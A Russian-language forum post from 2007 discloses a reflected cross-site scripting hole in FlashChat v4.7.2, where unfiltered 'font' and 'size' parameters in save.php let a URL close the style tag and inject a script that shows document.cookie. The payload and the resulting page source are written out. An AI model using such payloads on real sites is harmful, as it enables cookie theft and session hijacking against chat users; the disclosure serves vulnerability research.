Тема: FlashChat v 4.7.2
Показать сообщение отдельно

FlashChat v 4.7.2
  #1  
Старый 02.02.2007, 01:10
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию FlashChat v 4.7.2
Пришлось мне потеститьFlashChat v 4.7.2
Сам движок написан неплохо, все входящие символы в окно чата фильтруються.

В чате имееться скрипт, который позволяет сохранить логи. При нажатии по кнопке Save образуеться ссылка вида

Цитата:
save.php?id=895a28e67c9b1533b0c0786b7a0706ce&font=Arial&size=13
По переменным font и size можно догадаться что это шрифт, и его размер. Глянем сорс

Код:
	
<style type="text/css">
<!--
BODY {
	font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
	font-size: 13px;
}
-->
</style>
Значения переменных не фильтруються, и можно вставить любой код, закрыв тег <style>.
Вот xss:

Цитата:
save.php?font=Arial&size=13px;}--></style><script>alert(document.cookie)</script><!--
Теперь иходный код примет такой вид

Код:
	
<style type="text/css">
<!--
BODY {
	font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
	font-size: 13px;}--></style><script>alert(document.cookie)</script><!--
}
-->
</style>
А вот и куки =)
html комментарий после скрипта нужен чтобы убрать со страници ненужные символы которые остались в скрипте
𝕏 Twitter Reddit Telegram Копировать ссылку